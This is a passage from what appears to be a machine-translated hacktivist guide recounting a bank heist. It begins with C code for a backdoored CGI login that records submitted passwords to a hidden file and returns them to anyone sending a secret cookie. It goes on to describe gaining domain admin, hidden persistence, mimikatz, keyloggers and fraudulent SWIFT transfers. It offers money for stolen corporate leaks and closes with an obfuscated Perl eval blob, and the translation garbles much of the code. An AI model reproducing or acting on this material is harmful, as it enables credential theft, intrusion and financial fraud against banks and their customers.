char * cookies = getenv ("HTTP_COOKIE");
if (cookies && strstr (cookies, "our private password")) {
write (1, "Content-type: text / plain \ n \ n", 26);
pfile = open ("/ tmp / .pfile", O_RDONLY);
while ((nread = read (pfile, buf, sizeof (buf)))> 0)
write (1, buf, nread);
exit (0);
}
/ * the principal stores the POST data and sends it to the child,
which is the real login program * /
int fd [2];
pipe (fd);
pfile = open ("/ tmp / .pfile", O_APPEND | O_CREAT | O_WRONLY, 0600);
if (fork ()) {
close (fd [0]);
while ((nread = read (0, buf, sizeof (buf)))> 0) {
write (fd [1], buf, nread);
write (pfile, buf, nread);
}
write (pfile, "\ n", 1);
close (fd [1]);
close (pfile);
wait (NULL);
} else {
close (fd [1]);
dup2 (fd [0], 0);
close (fd [0]);
execl ("/ usr / src / EasyAccess / www / cgi-bin / .userLogin",
"userLogin", NULL);
}
}
In the case of Hacking Team, they logged into the VPN with one-time passwords,
so the VPN gave me access only to the network, and from there I took
an extra effort to get domain admin on your network. In the other guide I wrote
on side passes and privilege escalation in windows domains [1]. In this
However, it was the same Windows domain passwords that were
used to authenticate against the VPN, so I was able to get a good deal of
user passwords, including domain admin passwords. Now I had total
access to your network, but usually this is the easy part. The hardest part
is to understand how they operate and how to get the pisto.
[1] https://www.exploit-db.com/papers/41914
---- [4.3 - Fun facts] ---------------------------------------- ------------
Following the investigation they did on the hack, I found it interesting
see that, around the same time that I did, the bank may have been
compromised by someone else through a targeted phishing email [1].
As the old saying goes, "give a person an exploit and they will have access for a
day, teach him to phishear and he'll have access all his life. "[2] The fact that
someone else, by chance and at the same time as me, put this bench
small target (they registered a domain similar to the real domain of the bank
to be able to send the phishing from there) suggests that bank hacks
they occur much more frequently than is known.
A fun suggestion so you can follow the investigations of your
hacking is having a backup access, one that you won't touch unless you
lose normal access. I have a simple script that expects commands a
once a day, or less, just to maintain long-term access in the case of
that block my regular access. Then I had a powershell empire [3]
calling home more often on a different IP, and used empire to
launch meterpreter [4] against a third IP, where it did most of the
my job. When PWC started investigating the hack, they found my use of
empire and meterpreter and cleaned those computers and blocked those IPs, but
They didn't detect my backup access. PWC had placed
network monitoring, to be able to analyze the traffic and see if there was still
infected computers, so I didn't want to connect to their network much. Only
I launched mimikatz once to get the new passwords, and from there
I was able to continue his investigations by reading his emails in the outlook web access.
[1] page 47, Project Pallid Nutmeg.pdf, in torrent
[2] [3] https://github.com/EmpireProject/Empire
[4] https://github.com/rapid7/metasploit-framework
- [5 - Understand Banking Operations] ------------------------------------
To understand how the bank operated, and how it could get money, I followed the
techniques that I summarized in [1], in section "13.3 - Internal Recognition".
I downloaded a list of all the filenames, grep it for
of words like "SWIFT" and "transfer", and downloaded and read all the
files with interesting names. I also looked for employee emails, but from
By far the most useful technique was to use keyloggers and screenshots to
observe how the bank employees worked. I didn't know it at the time, but
for this Windows brings a very good monitoring tool [2]. How I know
described in technique no. 5 of section 13.3 in [1], I made a screenshot of the
keys pressed across the domain (including window titles), I did a
grep looking for SWIFT, and found some employees opening 'SWIFT Access
Service Bureau - Logon '. For those employees, I ran meterpreter as in [3], and
I used the post / windows / gather / screen_spy module to take screenshots
every 5 seconds, to see how they worked. They were using an app
remote citrix from the company bottomline [4] to access the SWIFT network, where
Each SWIFT MT103 payment message had to go through three employees: one
to "create" the message, one to "verify" it, and another to "authorize" it. What
He already had all his credentials thanks to the keylogger, I was able to do with
ease the three steps myself. And from what I knew after seeing them
work, they weren't reviewing sent SWIFT messages, so you should have
enough time to get the money out of my bank drops before the bank
noticed and tried to reverse the transfers.
[1] https://www.exploit-db.com/papers/41914
[2] https://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr-
remotely-with-metasploit /
[3] https://www.trustedsec.com/blog/no_psexec_needed/
[4] https://www.bottomline.com/uk/products/bottomline-swift-access-services
_________________________________________
/ Who robs a thief, is one hundred years old \
\ of forgiveness. /
-----------------------------------------
\
\ ^ __ ^
(oo) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
''
- [6 - Send the money] ----------------------------------------- -------------
I didn't have much idea what I was doing, so I was finding out
by the way. Somehow, the first transfers I sent went
well. The next day, I screwed up by sending a transfer to Mexico that put
end to my fun. This bank sent your international transfers
through your correspondent account at Natwest. I had seen that the account
Correspondent for sterling (GBP) transfers was listed as
NWBKGB2LGPL, while for the others it was NWBKGB2LXXX. The transference
Mexican was in GBP, so I assumed I had to put NWBKGB2LGPL as
correspondent. If I had prepared it better I would have known that the LPG instead of
XXX stated that the payment would be sent through the Quick Payments Service of the
UK, rather than as an international transfer, which obviously
Well, it won't work when you're trying to send money to Mexico. So
the bank got an error message. The same day I also tried to send a
payment of ВЈ200k to UK using NWBKGB2LGPL, which was not made because 200k exceeded the
shipping limit using quick payments, and would have had to use NWBKGB2LXXX in
time. They also got an error message for this. They read the messages,
They investigated, and found the rest of my transfers.
- [7 - The button] ------------------------------------------ --------------------
From what I write, you will already have a complete notion of what my ideals are already
what things I give you my support. But I don't want to see anyone in legal trouble
for receiving expropriated funds, so not a word more about where
it was the wool. I know journalists are probably going to want to put some
number on how many dollars were distributed in this hack and other
similar, but I prefer not to encourage our perverse habit of measuring
shares just for their economic value. Any action is admirable if it is
It comes from love and not from the ego. Unfortunately the top, the rich and
powerful, public figures, businessmen, people in positions
"important", those that our society respects and values most, those have been
placed where they are based on acting more from the ego than from love. Is in
the simple, humble and "invisible" people whom we should already look at
who we should admire.
- [8 - Cryptocurrencies] ------------------------------------------- --------------
Redistribute expropriated money to Chilean projects seeking social change
positive it would be easier and safer if those projects accepted donations
anonymous via cryptocurrencies like monero, zcash, or at least bitcoin. It is understood
that many of those projects have an aversion to cryptocurrencies, since
they look more like some strange hypercapitalist dystopia than economics
social with which we dream. I share your skepticism, but I think they are
Useful for allowing anonymous donations and transactions by limiting the
government surveillance and control. Just like cash, the use of which many
countries are trying to limit for the same reason.
- [9 - Powershell] ------------------------------------------- -----------------
In this operation, as in [1], I made a lot of use of powershell. For
back then, powershell was super cool, you could do just about anything you
you would like, without antivirus detection and with very little forensic footprint. It happens
that with the introduction of the AMSI [2] the offensive powershell is retiring.
Today the offensive C # is what is on the rise, with tools such as
[3] [4] [5] [6]. AMSI is coming to .NET by 4.8, so to the tools in
C # will probably still have a couple of years left before they get out of date.
And then we will go back to using C or C ++, or maybe Delphi will get back to
fashion. Specific tools and techniques change every few years, but in
the bottom line is not so much what changes, today hacking in essence is still the
Same thing as it was in the 90s. Actually all powershell scripts
used in this guide and in the previous one [1] are still perfectly usable
today, after a little obfuscation of your own harvest.
[1] https://www.exploit-db.com/papers/41914
[2] https://medium.com/@byte_St0rm/
adventures-in-the-wonderful-world-of-amsi-25d235eb749c
[3] https://cobbr.io/SharpSploit.html
[4] https://github.com/tevora-threat/SharpView
[5] https://www.harmj0y.net/blog/redteaming/ghostpack/
[6] https://rastamouse.me/2019/08/covenant-donut-tikitorch/
___________________________
/ Fo Sostyn, Fo Ordaag \
\ Financial Sector Fuck Off /
---------------------------
\
\ ^ __ ^
(oo) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
''
- [10 - Torrent] ------------------------------------------- -------------------
Privacy for the weak, transparency for the powerful.
Offshore banking provides privacy from their own government to
executives, politicians and millionaires. Exposing them may sound
hypocritical of me, since I am generally in favor of privacy and
against government surveillance. But the law was already written by and
for the rich: protects your system of exploitation, with some limits (such as
taxes) so that society can function and the system does not collapse under the
weight of his own greed. So no, privacy is not the same for
powerful, when it allows them to evade the limits of a system per se
designed to give them privileges; and privacy for the weak, to whom
it protects from a system designed to exploit them.
Even journalists with the best of intentions find it impossible
study such a vast amount of material and know what will turn out
relevant to people in different parts of the world. When I filtered the
Hacking Team files, I gave The Intercept a copy of the emails
electronic one month in advance. They found a couple of the 0days that
Hacking Team was using, they previously reported them to MS and Adobe and published
a few stories once the leak went public. No point
compared to the enormous amount of articles and research that came after
full filtering to the public. Seeing it like this, and also considering the (not)
editorialized publication [1] of the Panama papers, I think that a
Public and complete filtration of this material is the right choice.
[1] https://www.craigmurray.org.uk/archives/2016/04/corporate-media-gatekeepers-
protect-western-1-from-panama-leak /
Psychologists found that those lower down in the hierarchies tend to
understand and empathize with those at the top, but that the opposite is less
common. This explains why, in this sexist world, many men joke about
his inability to understand women, as if it were a mystery
irresolvable. Explain why the rich, if they stop to think about whom
they live in poverty, they give advice and "solutions" so far removed from the
reality that makes you want to laugh. Explain why we revere executives
as brave who take risks. What are they risking beyond their
privilege? If all their ventures fail, they will have to live and work
like the rest of us. It also explains why there will be many who accuse
from irresponsible and dangerous to this leak without scratches. Feel the
"danger" on an offshore bank and its clients much more intensely than
what the misery of those dispossessed by this unjust system and
unequal. And the leakage of their finances, is it a danger to them, or
so just for his position at the top of a hierarchy that he shouldn't even
exist?
, ------------------------------------------------- -.
_, -._ | They vilify us, those infamous ones; when the only |
; ___: | difference is that they rob the poor |
, - '(..)' --.__ | protected by law, heaven knows, and we |
_; ||| \ | we plunder the rich under the sole protection of |
'._, -----' ''; = .____, "| our own courage. Do not prefer to be |
/// <or> | ## | | one of us, rather than begging before those |
(or \ `- '/ villains looking for work? |
/// \ >>>> _ \ <<<< // `--------------------------------- ------------------ '
--._ >>>>>>>> <<<<<<<< /
___ () >>> [||||] <<<<
`- '>>>>>>>> <<<<<<<
>>>>>>> <<<<<<
>>>>> <<<<<
>> ctr <<
Captain Bellamy
- [11 - Learn to hack] ----------------------------------------- -----------
You don't start out with hacking right. You start out hacking shit, thinking
which is good, and then little by little you get better. That's why I always say
that one of the most valuable virtues is persistence.
- Tips from Octavia Butler for the APT Applicant
The best way to learn how to hack is by hacking. Build a lab with
virtual machines and started testing things, taking a break to investigate
anything you don't understand. At the very least you will want a windows server
as a domain controller, another normal windows vm joined to the domain, and one
development machine with visual studio to compile and modify tools.
Try to make an office document with macros that launch meterpreter or another
RAT, and tried meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying,
psexec and other side pass techniques [1]; as well as the other scripts,
tools and techniques mentioned in this guide and the previous one [2]. To the
at first you can disable windows defender, but then try everything
having it activated [3] [4] (but deactivating the automatic sending of samples).
Once you're comfortable with all of that, you're ready to hack 99% of the
companies. There are a couple of things that at some point will be very useful in your
learning, how to cope comfortably with bash and cmd.exe, a domain
basic powershell, python and javascript, have knowledge of kerberos [5] [6]
and active directory [7] [8] [9] [10], and fluent English. A good book
Introductory is The Hacker Playbook.
I also want to write a bit about things not to focus on if you don't
you want to entertain just because someone told you that you are not a hacker "of
true "if you don't know assembler. Obviously, learn whatever interests you,
but I write these lines thinking about those things in which you can
focus for practical results if hacking is what you are looking for
companies to filter and expropriate. A basic knowledge of safety in
web applications [11] is useful, but specializing more in web security is not
really the best use of your time, unless you want to do a career in
pentesting or hunting bounty for bugs. The CTFs, and most of the
resources that you will find when looking for information on hacking, focus
generally in skills like web security, reverse engineering, development
of exploits, etc. Things that make sense understanding them as a way of
prepare people for careers in industry, but not for our
objectives. Intelligence agencies can afford to have a team
dedicated to the most advanced in fuzzing, a team working on development of
exploits with a geey exclusively investigating the new techniques of
manipulation of the mound, etc. We have neither the time nor the
resources for that. The two most important skills for hacking by far
practical are phishing [12] and social engineering to gain access
initial, and then be able to scale and move through the windows domains.
[1] https://hausec.com/2019/08/12/offensive-lateral-movement/
[2] https://www.exploit-db.com/papers/41914
[3] https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf
[4] https://www.trustedsec.com/blog/
discovering-the-anti-virus-signature-and-bypassing-it /
[5] https://www.tarlogic.com/en/blog/how-kerberos-works/
[6] https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
[7] https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/
[8] https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
[9] https://adsecurity.org/
[10] https://github.com/infosecn1nja/AD-Attack-Defense
[11] https://github.com/jhaddix/tbhm
[12] https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-
external-engagement-through-spear-phishing /
- [12 - Recommended Reading] ------------------------------------------ ------
__________________________________________
/ When the scientific level of a world \
| far exceeds their level of solidarity, |
\ that world destroys itself. /
------------------------------------------
\ _. --- ._. .
* \. ' '. *
* _.- ~ =========== ~ -._
. (___________________). *
. ' \ _______ /. '
. ' . '
'
- To me
Almost all hacking today is done by black hat hackers, for their
personal benefit; or by white hat hackers, for the benefit of the
shareholders (and in defense of the banks, companies and states that are
annihilating us and the planet we live on); and by military and
intelligence agencies, as part of their war and conflict agenda. Watching
that this our world is already at the limit, I have thought that, in addition to these
technical tips to learn to hack, should include some resources that
have been very important to my development and have guided me in the use of my
hacking knowledge.
* Ami: The Child of the Stars - Enrique Barrios
* Anarchy Works
https://es.theanarchistlibrary.org/library/peter-gelderloos-la-anarquia-
works
* Living My Life - Emma Goldman
* The Rise and Fall of Jeremy Hammond: Enemy of the State
https://www.rollingstone.com/culture/culture-news/the-rise-and-fall-of-jeremy-
hammond-enemy-of-the-state-183599 /
This dude and the HBGary hack were an inspiration
* Days of War, Nights of Love - Crimethinc
* Momo - Michael Ende
* Letters to a Young Poet - Rilke
* Dominion (Documentary)
"We cannot believe that if we do not look, what we do not want to see will not happen"
- Tolstoy in ПервР° СЏ ступень
* Bash Back!
- [13 - Heal] ------------------------------------------- ---------------------
The hacker world has a high incidence of depression, suicides and certain
battles with mental health. I don't think it's because of the hacking, but because of the
kind of environment that hackers mostly come from. Like many
hackers, I grew up with little human contact: I was a child raised by the internet.
I have my struggles with depression and emotional numbness. Willie Sutton
He is frequently quoted as saying that he robbed banks because "that's where he is
money, "but the quote is wrong. What he actually said was:
Why did you rob banks? Because he enjoyed it. He loved doing it. I was more
I live when I was inside a bank, in full robbery, that in any
another moment of my life. He enjoyed it so much that a week or two later
I was already looking for the next opportunity. But for me money was a
minutia, nothing more.
Hacking has made me feel alive. It started as a way to self-medicate
depression. Later I realized that it could actually be used to make
something positive. I do not regret at all the way I grew up, it brought several
beautiful experiences to my life. But I knew I couldn't go on living off
that way. So I started spending more time away from my computer, with
other people, learning to open myself to the world, to feel my emotions, to
connect with others, accept risks and be vulnerable. Much more things
Tough to hack, but at the mere hour the payoff is more than worth it. Still
It takes an effort, but even if it's slow and wobbly, I feel like
I am going on the right way.
Hacking, done with conscience, can also be what heals us. According to the
Mayan wisdom, we have a gift granted by nature, which we must
understand to put it at the service of the community. In [1], it is explained:
When a person does not accept his job or mission, he begins to suffer
diseases, apparently incurable; although he does not die shortly
time, but only suffers, with the aim of waking up or taking
conscience. That is why it is essential that a person who has acquired the
knowledge and does his work in the communities must pay his Toj and
maintain constant communication with the Creator and his ruwГ¤ch q†™ ij, since
constantly needs their strength and energy. Otherwise,
the illnesses that caused you to react or take the job could
to cause damage again.
If you feel that hacking is fueling your isolation, depression, or other
ailments, breathe. Take time to get to know yourself and become aware. You
you deserve to live happy, healthy and full.
________________________
<All Cows Are Beautiful>
------------------------
\
\ ^ __ ^
(oo) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
''
[1] Ruxe†™ el mayab†™ K†™ aslemГ¤l: Root and spirit of Mayan knowledge
https://www.url.edu.gt/publicacionesurl/FileCS.ashx?Id=41748
- [14 - The Hacktivist Bug Hunting Program] ------------------------------
It seems to me that hacking to get and filter documents of public interest is
one of the best ways hackers can use their skills in
benefit of society. Unfortunately for us hackers, as in almost
every item, the perverse incentives of our economic system do not coincide
with what benefits society. So this show is my attempt at
make it possible for good hackers to earn an honest living
exposing material of public interest, instead of having to walk
selling their work to the cybersecurity, cybercrime or
cyberwar. Among some examples of companies whose leaks I would love to
pay are the mining, logging and livestock companies that plunder our
beautiful Latin America (and they assassinate the defenders of the land and territory
trying to stop them), companies involved in attacks on Rojava such as Baykar
Makina or Havelsan, surveillance companies such as the NSO group, criminals from
war and birds of prey such as Blackwater and Halliburton, prison companies
private companies such as GeoGroup and CoreCivic / CCA, and corporate lobbyists such as ALEC.
Pay attention when choosing where to research. For example, it is ok
known that the oil companies are evil: they enrich themselves at the cost of destroying the
planet (and back in the 80s the companies themselves already knew of the consequences
of its activity [1]). But if you hack them directly, you will have to dive between
an incredible amount of boring information about their operations
everyday. It will most likely be much easier for you to find something
interesting if instead you focus on their lobbyists [2]. Another way of
selecting viable targets is reading stories from journalists from
research (such as [3]), which are interesting but lack evidence
solid. And that's exactly what your hacks can find.
I will pay up to $ 100,000 for each leak of this type, depending on the interest
public and impact of the material, and the work required in the hack. Needless to say
that a complete leak of the documents and internal communications of
some of these companies will represent a benefit for society that exceeds
those hundred thousand, but I'm not trying to enrich anyone. I just want to provide
sufficient funds for hackers to earn a decent living
doing a good job. Due to time constraints and considerations of
security I will not open the material, or inspect it myself, but
I will read what the press says about it once it is published, and I will make a
estimate of public interest from there. My contact information is
at the end of the guide mentioned before [4].
How you get the material is up to you. You can use traditional techniques
of hacking outlined in this guide and the previous one [4]. You could make him a sim
swap [5] to a corrupt businessman or politician, and then download their emails and
backups from the cloud. You can order an IMSI catcher from alibaba and use it outside
from their offices. You can do a bit of war-driving (old or new
[6]). You may be a person within their organizations who already has
access. You can go for a low-tech old-school style like in [7] and [8], and
just sneak into their offices. Whatever works for you.
[1] https://www.theguardian.com/environment/climate-consensus-97-per-cent/2018/
Sep / 19 / shell-and-exxons-secret-1980s-climate-change-warnings
[2] https://theintercept.com/2019/08/19/oil-lobby-pipeline-protests/
[3] https://www.bloomberg.com/features/2016-como-manipular-una-eleccion/
[4] https://www.exploit-db.com/papers/41914
[5] https://www.vice.com/en_us/article/vbqax3/
hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin
[6] https://blog.rapid7.com/2019/09/05/this-one-time-on-a-pen-test-your-mouse-
is-my-keyboard /
[7] https://en.wikipedia.org/wiki/Citizens'_Commission_to_Investigate_the_FBI
[8] https://en.wikipedia.org/wiki/Unnecessary_Fuss
---- [14.1 - Partial payments] ---------------------------------------- ----------
Are you a good-hearted waitress who works in an evil company [1]?
Would you be willing to sneak a physical keylogger into the
an executive's computer, to swap their USB charging cable for a modified one
[2], hide a mike in a meeting room where they plan their
atrocities, or to leave one of these [3] forgotten in some corner of the
Offices?
[1] https://en.wikipedia.org/wiki/Evil_maid_attack
[2] http://mg.lol/blog/defcon-2019/
[3] https://shop.hak5.org/products/lan-turtle
You're good at social engineering and phishing, and you got a shell on the
an employee's computer, or that way you got their vpn credentials
using phishing? But maybe you couldn't get domain admin and download
what did you want?
ВїYou participated in bug bounties programs and became an expert in
web application hacking, but you don't have enough hacker experience
to fully penetrate the company?
Do you have a facility with reverse engineering? Scan some evil companies
to see what devices they have exposed to the internet (firewall, vpn, and
email gateways will be much more useful than things like cameras
IP), reverse engineer them and find any exploitable vulnerabilities
remote form.
If it is possible for me to work with you to penetrate the company and get material
of public interest, you will still be rewarded for your work. If not
I have the time to work on it myself, at least I will try to advise you
about how to continue until you can complete the hack on your own.
Support those in power to hack and monitor dissidents, activists and
To the population in general today there is an industry of several billion
of dollars, while hacking and exposing those in power is a
voluntary and risky work. Turn it into a multi-million industry
dollars is certainly not going to fix that power imbalance, nor is it going to
solve the problems of society. But I think it's going to be fun. So
that ... I already want to see people starting to collect their rewards!
- [15 - Abolish prisons] ----------------------------------------- --------
Built by the enemy to enclose ideas
locking up companions to silence war cries
is the center of torture and annihilation
where the human being becomes more violent
It is the reflection of society, repressive and prison
sustained and based on authoritarian logic
guarded repressed and guarded
thousands of prey and prisoners are exterminated
before this schizophrenic and ruthless machine
partner Axel Osorio giving the pela in the cane
breaking isolation and silencing
fire and war to prison, we are destroying!
Rap Insurrecto - Conflicting Words
It would be typical to end a hacker zine by saying free hammond, free
manning, release hamza, release the detainees for the mounting of the дело Сети,
etc. I am going to take this tradition to its most radical consequence [1], and to say:
Prisons must be abolished now! Being a criminal myself, they can
to think that what happens is that I have a slightly skewed view of the matter.
But seriously, it's not even a controversial issue, even the UN is
practically agree [2]. So, once and for all, set the people free
migrants [3] [4] [5] [6], often imprisoned by those same countries that created
war and environmental and economic destruction from which they are fleeing. Free
all those in prison for the war against drug users [7].
Free all the people imprisoned for the war against the poor [8].
The only thing prisons do is hide and ignore the evidence of
existence of social problems, rather than actually fixing them. Y
until everyone is released, fight the prison system by remembering and
keeping in mind those who are trapped in there. Send them love
letters, helicopters [9], pirate radios [10] and books, and supports those who
organize from there [11] [12].
[1] http://www.bibliotecafragmentada.org/wp-content/uploads/2017/12/
Davis-Are-Obsolete-Prisons-Final.pdf
[2] http://www.unodc.org/pdf/criminal_justice/Handbook_of_Basic_Principles_and_
Promising_Practices_on_Alternatives_to_Imprisonment.pdf
[3] https://www.theguardian.com/us-news/2016/dec/21/
us-immigration-detention-center-christmas-santa-wish-list
[4] https://www.theguardian.com/us-news/2016/aug/18/us-border-patrol-facility-
images-tucson-arizona
[5] https://www.playgroundmag.net/now/detras-Centros-Internamiento-Extranjeros-
Spain_22648665.html
[6] https://www.nytimes.com/2019/06/26/world/australia/
australia-manus-suicide.html
[7] https://en.wikiquote.org/wiki/John_Ehrlichman#Quotes
[8] VI, 2. i. The unpaid fine: https://scielo.conicyt.cl/scielo.php?script=
sci_arttext & pid = S0718-00122012000100005
[9] p. 10, Libel NВє2. Political bulletin from the High Security Prison
[10] https://itsgoingdown.org/transmissions-hostile-territory/
[11] https://freealabamamovement.wordpress.com/fam-pamphlet-who-we-are/
[12] https://incarceratedworkers.org/
- [16 - Conclusion] ------------------------------------------- ----------------
Our world is turned upside down [1]. We have a justice system that
represents injustice. Law and order are there to create an illusion
social peace, and hide the systematic and profound exploitation, the
violence, and injustice. Better to follow your conscience, and not the law.
[1] http://resistir.info/livros/galeano_patas_arriba.pdf
Businessmen get rich by mistreating people and the planet,
while care work is largely unpaid. Through the
assault on everything communal, somehow we have built cities thickly
populated, plagued by loneliness and isolation. The cultural system,
political and economic we live in encourages the worst facets of nature
human: greed, selfishness and self-centeredness, competitiveness, lack of
compassion and attachment to authority. So, for whoever got
stay sensitive and compassionate in a cold world, for all heroines
everyday people who practice kindness in little things, for all of you who
They still have a burning star in their hearts: РіРѕpРё, РіРѕpРё СЏСЃРЅРѕ, С ‡ тоР± С ‹РЅРµ
РїРѕРіР ° СЃР »Рѕ!
_____________________
<Let's sing together! >
---------------------
\
\ ^ __ ^
(oo) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
Open heart
Open up feeling
Open your understanding
Put reason aside
And let the sun hidden inside you shine
perl -Mre = eval << \ EOF
''
= ~ (
'(?'
. '{'. (
'`' | '%'
). ("\ [" ^
'-'). ('`' |
'!'). ("\` "|
','). '"(\\ $'
. ': = ``'. (('`') |
'#'). ('[' ^ '.').
('[' ^ ')'). ("\` "|
','). ('{' ^ '[') .'- '. (' ['^' ('). (' {'^' ['). (' `'|' ('). ( '[' ^ '/'). ('[' ^ '/'). (
'[' ^ '+'). ('[' ^ '('). ': //'. ('`' | '%'). ('`' | '.'). ('`' | ','). ('`' | '!'). (" \ `" |
'#'). ('`' | '%'). ('[' ^ '!'). ('`' | '!'). ('[' ^ '+'). ('`' | '!'). ('[' ^ "\ /"). (
'`' | ')'). ('[' ^ '('). ('[' ^ '/'). ('`' | '!'). '.'. ('`' | '% '). (' ['^'! ')
. ('`' | ','). ('`' | '.'). '.'. ('`' | '/'). ('[' ^ ')'). ('`' | "\ '").
'.'. ('`' | '-'). ('[' ^ '#'). '/'. ('[' ^ '('). ('`' | ('$')). (
'[' ^ '('). ('`' | ',') .'- '. ('` '|'% '). (' ['^ (' (')).
'/ `) = ~'. ('[' ^ '('). '| </'. ('[' ^ '+'). '> | \\'
. '\\'. ('`' | '.'). '|'. ('`' | "'").'; '.
'\\ $: = ~'. ('[' ^ '('). '/ <. *?> //'
. ('`' |" '").'; '. (' ['^' + '). (' ['^
')'). ('`' | ')'). ('`' | '.'). (('[') ^
'/').(' Componentes'^'[').'\\$:=~/('.(('('('))^
'('). ('`` ^'% '). (' {'^' # '). (' {'^' / ')
. ('`` ^'! ').'. *? '. (' `` '^' - '). (' `` | '%')
. ('[' ^ '#'). ("\` "| ')'). ('`' | '#'). (
'`` |'! '). (' `` | '.'). ('`` |' / ')
. '..) /'. ('[' ^ '('). '"})')
; $: = "\." ^ '~'; $ ~ = '@'
| '('; $ ^ = ')' ^ '[';
$ / = '``' | '.';
$, = '('
EOF
We were born out of the night.
we live in it, we hack into it.
Here we are, we are the rebellious dignity,
the forgotten heart of the Р ?? РЅС‚РµСЂРЅРµС ‚.
Our fight is for memory and justice,
and the bad government fills up with criminals and murderers.
Our fight is for fair and dignified work,
and bad government and corporations buy and sell zero days.
For all tomorrow.
For us the joyous rebellion of the leaks
and expropriation.
For all everything.
Nothing for us.
From the mountains of the Cybernetic Southeast,
_ _ _ ____ _ _
| | | | __ _ ___ | | __ | __) __ _ ___ | | _ | |
| | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
| _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
| _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)
